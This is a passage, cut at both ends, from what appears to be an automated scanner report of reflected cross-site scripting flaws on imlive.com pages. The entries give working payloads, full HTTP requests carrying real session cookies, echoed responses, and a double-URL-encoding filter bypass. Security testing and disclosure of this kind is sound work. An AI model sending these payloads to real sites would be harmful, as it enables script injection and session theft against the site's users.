Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:53 GMT
Connection: close
Content-Length: 74955
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-advanced-search/?9af1e"><a>4c3fec81c51=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.568. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-faq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57b4'-alert(1)-'0e1cfcefff7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:52 GMT
Connection: close
Content-Length: 44471
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/faq_m1.aspx&he=imlive.com&ul=/webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

4.569. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/webcam-faq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5762"><a>e3b37a89d43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-faq/?a5762"><a>e3b37a89d43=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:51 GMT
Connection: close
Content-Length: 44322
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-faq/?a5762"><a>e3b37a89d43=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.570. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a901'-alert(1)-'19762fb72eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /webcam-login/?6a901'-alert(1)-'19762fb72eb=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:17:22 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 22258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/login.aspx&he=imlive.com&ul=/webcam-login/?6a901'-alert(1)-'19762fb72eb=1&rf=http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f&qs=6a901'-alert(1)-'19762fb72eb=1&qs=6a901'-alert(1)-'19762fb72eb=1&bd=2257131737&sr=1
...[SNIP]...

4.571. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/webcam-login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2bef"><a>297c1fbe51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-login/?f2bef"><a>297c1fbe51b=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:17:20 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 22109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-login/?f2bef"><a>297c1fbe51b=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.572. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/webcam-sign-up/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80602"><a>69f3ca0322b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-sign-up/?80602"><a>69f3ca0322b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:48 GMT
Connection: close
Content-Length: 41134
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-sign-up/?80602"><a>69f3ca0322b=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.573. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-sign-up/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bdfe'-alert(1)-'167f160a9b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /webcam-sign-up/?5bdfe'-alert(1)-'167f160a9b3=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:49 GMT
Connection: close
Content-Length: 41283
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/?5bdfe'-alert(1)-'167f160a9b3=1&qs=5bdfe'-alert(1)-'167f160a9b3=1&qs=5bdfe'-alert(1)-'167f160a9b3=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

4.574. http://imlive.com/wmaster.ashx [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/wmaster.ashx

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f was submitted in the gotopage parameter. This input was echoed as 244f6'><script>alert(1)</script>7358040fd9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f&waron=yes&promocode=YZSUSA5583 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:04:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyLRxWQc0aKAUPIcMr1z98%2F8hVk8Zl52g6XTc8ahIm5wd6Dpvk1%2Ff8Hrm5IPl4A2Xrmhuo0zzjA78ETPbWo0pNpB; path=/
Set-Cookie: ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; path=/
X-Powered-By: vsrv47
Date: Fri, 28 Jan 2011 14:04:49 GMT
Set-Cookie: BIGipServerImlive=2366899778.20480.0000; path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 8350

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
alytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp244f6%27%3e%3cscript%3ealert%281%29%3c%2fscript%3e7358040fd9f&lr=1107816005&ud=0&pe=404.asp&qs=404;http://imlive.com:80/homepagems3.asp244f6'><script>alert(1)</script>7358040fd9f&sr=0&iy=dallas&id=44&iu=1' height='1' width='1'>
...[SNIP]...

4.575. http://in.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://in.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30418"><script>alert(1)</script>eb906244d97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?30418"><script>alert(1)</script>eb906244d97=1 HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=p0jnew55vw3nxqrrsihsgjjf; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=p0jnew55vw3nxqrrsihsgjjf; path=/; HttpOnly
Set-Cookie: spvdr=vd=62454ef9-3278-4fa1-be68-74c4c836f2eb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:36 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 22110
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||30418"><script>alert(1)</script>eb906244d97~1');return false;">
...[SNIP]...

4.576. http://in.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://in.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76f4b'-alert(1)-'bf4b062c8a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?76f4b'-alert(1)-'bf4b062c8a0=1 HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=oqywnfmllyyd1xzaovvpmu2g; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=oqywnfmllyyd1xzaovvpmu2g; path=/; HttpOnly
Set-Cookie: spvdr=vd=ad80ea2b-9f30-4fa6-87d5-ff9831af5170&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:36 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 21709
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=in.imlive.com&ul=/?76f4b'-alert(1)-'bf4b062c8a0=1&qs=76f4b'-alert(1)-'bf4b062c8a0=1&qs=76f4b'-alert(1)-'bf4b062c8a0=1&iy=dallas&id=44&iu=1&vd=ad80ea2b-9f30-4fa6-87d5-ff9831af5170';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.577. http://in.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://in.imlive.com
Path:	/waccess/

Issue detail

